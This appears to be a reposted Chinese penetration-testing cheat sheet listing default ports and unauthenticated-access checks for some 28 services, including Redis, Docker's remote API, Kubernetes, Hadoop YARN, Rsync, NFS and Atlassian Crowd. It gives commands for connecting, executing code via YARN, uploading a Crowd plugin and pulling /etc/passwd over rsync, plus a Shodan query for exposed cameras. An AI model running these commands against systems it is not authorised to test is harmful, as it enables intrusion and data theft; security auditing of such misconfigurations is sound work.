端口未授权总结(外部打点) [url=]船山信安[/url] 默认端口统计:[21, 139, 873, 2049, 2181, 2182, 2375, 5601,5672, 5900, 5901, 5984, 6379, 6443, 8080, 8088, 8095, 8161, 9100, 9200, 9300,11211, 15672, 15692, 20048, 25672, 27017] 1. Memcached 未授权访问漏洞默认端口11211漏洞验证 telnet 10.10.4.89 11211 或 nc -vv 11211 无需用户名密码,可以直接连接memcache 服务的11211端口 使用了 stats 命令来输出 Memcached 服务信息 2. ZooKeeper 未授权访问 默认端口2181,2182漏洞验证 安装ZooKeeper,然后连接到服务。 # tar -xzvfapache-zookeeper-3.6.1-bin.tar.gz # cd apache-zookeeper-3.6.1-bin/bin # ./zkCli.sh -timeout 0 -r -server10.10.4.72:2181 备注:windows 下为:zkCli.cmd -timeout0 -r -server 10.10.4.72:2181 3. Elasticsearch 未授权访问 默认端口9100,9200,9300漏洞验证 使用nmap寻找相关的端口和服务,直接访问脆弱的服务: http://10.2.20.48:9100/metrics 4. Kibana 未授权访问 默认端口5601(最好直接访问目录可以正常访问就可以shell)漏洞验证 直接访问kibana的页面, https://10.10.4.89/app/kibana 并且无需账号密码可以登录进入界面。 5. Docker Remote API 未授权访问漏洞 默认端口2375漏洞验证 直接使用浏览器访问: http://10.10.4.89:2375/ http://10.10.4.89:2375/version http://10.10.4.89:2375/info docker -H tcp://192.168.15.5:2375version docker -H tcp://10.10.4.89:2375images 6. Kubernetes Api Server 未授权访问漏洞 Kubernetes 的服务在正常启动后会开启两个端口8080,6443漏洞验证 使用nmap寻找相关的端口和服务,直接访问脆弱的服务: 端口:10250端口是kubelet API的HTTPS端口,通过路径/pods获取环境变量、运行的容器信息、命名空间等信息。 http://192.168.56.101:8001/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/#!/login 9.Hadoop 未授权访问 默认端口:8088漏洞验证 使用nmap寻找相关的端口和服务,直接访问脆弱的服务: 可完成攻击,命令被执行,在相应目录下可以看到生成了对应文件 curl-s -i -X POST -H 'Accept:application/json' -H 'Content-Type: application/json'http://ip:8088/ws/v1/cluster/apps--data-binary @1.json http://192.168.18.129:50075/ 10. jenkins未授权访问漏洞 默认8080检测方法 先用 nmap 扫描查看端口开放情况看是否开放, 11. ActiveMQ未授权访问漏洞 默认端口8161漏洞验证 先用 nmap 扫描查看端口开放情况看是否开放, ActiveMQ默认使用8161端口,默认用户名和密码是admin/admin 12. RabbitMQ未授权访问漏洞 漏洞验证 http://10.10.4.89:15672 http://10.10.4.89:25672/ http://10.10.4.89:15692/ 默认账号密码都是guest 13. Springboot actuator 未授权访问 漏洞特征:图标(绿叶子)和报错页面漏洞验证 直接访问相关路径: http://10.2.20.48:/autoconfig Spring Boot Actuator从未授权访问到getshell https://blog.csdn.net/qq_38154820/article/details/106330264 14. FTP未授权访问漏洞(匿名登录) 默认端口:21漏洞验证 直接访问ftp路径:ftp://ip:port/ 15. JBOSS 未授权访问漏洞 漏洞特征:8080端口访问后左上角有jboss logo漏洞验证 先用 nmap 扫描查看端口开放情况看是否开放 JBOSS 端口。再使用漏洞测试工具测试 jmx 组件存在情况通过访问 http://ip:jboss端口/ 看是否能进入 jmx-console 和 web-console 。 16. ldap未授权访问 漏洞特征:phpldapadmin目录https://www.cnblogs.com/Zh1z3ven/p/13894171.html 漏洞验证 使用nmap寻找到相关的LDAP服务器,可以使用ldapbrowser直接连接,获取目录内容。 17. Rsync 未授权访问漏洞 漏洞特征:默认端口873漏洞验证 #rsync rsync://{target_ip}/ #rsync rsync://172.16.2.250:873/ #rsync rsync://172.16.2.250:873/src 利用rsync下载任意文件 rsyncrsync://172.16.2.250:873/src/etc/passwd ./ 18. VNC 未授权访问漏洞 默认端口号为5900、5901。漏洞验证 vncviewer 192.168.15.8 19. dubbo 未授权访问漏洞 无明显特征 漏洞验证 telent IP port 链接进入dubbo 服务,进行操作。 20. NFS 共享目录未授权访问 默认端口2049,20048。漏洞验证 apt install nfs-common 安装nfs客户端 showmount -e 192.168.70.162 查看nfs服务器上的共享目录 mount -t nfs 192.168.70.162:/grdata/mnt 挂载到本地 21. druid 未授权访问 漏洞描述 当开发者配置不当时就可能造成未授权访问下面给出常见Druid未授权访问路径 /druid/websession.html /system/druid/websession.html /webpage/system/druid/websession.html(jeecg) 22. CouchDB 未授权访问漏洞 默认端口:5984漏洞验证 使用nmap寻找相关的端口和服务,直接访问脆弱的服务: 23. Atlassian Crowd 未授权访问漏洞 漏洞特征:左上角atlassian的logo 默认端口:8095漏洞验证 进行上传一个标准的插件,来自atlassian-bundled-plugins中的applinks-plugin-5.4.12.jar curl --form"file_cdl=@applinks-plugin-5.4.12.jar"http://192.168.18.138:8095/crowd/admin/uploadplugin.action -v 24. Jupyter Notebook 未授权访问漏洞 漏洞特征:左上角有logo,jupyter漏洞验证 利用terminal命令执行:New > Terminal 创建控制台 可以执行任意命令 25.Windows ipc 共享未授权访问 默认端口:139漏洞验证 本地验证: 使用工具进行扫描,远程验证 26. RTSP未授权访问漏洞 默认端口554RTSP(Real Time Streaming Protocol),实时流传输协议,是TCP/IP协议体系中的一个应用层协议,该协议定义了一对多应用程序如何有效地通过IP网络传送多媒体数据,被广泛用于视频直播领域 所以直接访问554,如果没有做权限验证,会被直接看到 在shadon搜索port:554 has_screenshot:true,我们可以看到有大量的摄像头存在此类安全问题 27. redis未授权 默认端口6379漏洞验证 安装Redis,然后连接到服务。 yum install redis redis-cli -h 10.2.20.73 -p 6379 10.2.20.73:6379> info 28. Mongodb 未授权默认端口27017漏洞验证 安装mongodb,然后连接到服务。 yum install mongodb mongo --host 10.2.20.34 --port 27017 xxx-test:SECONDARY> show dbs 来源:【端口未授权总结(外部打点) - FreeBuf网络安全行业门户】
|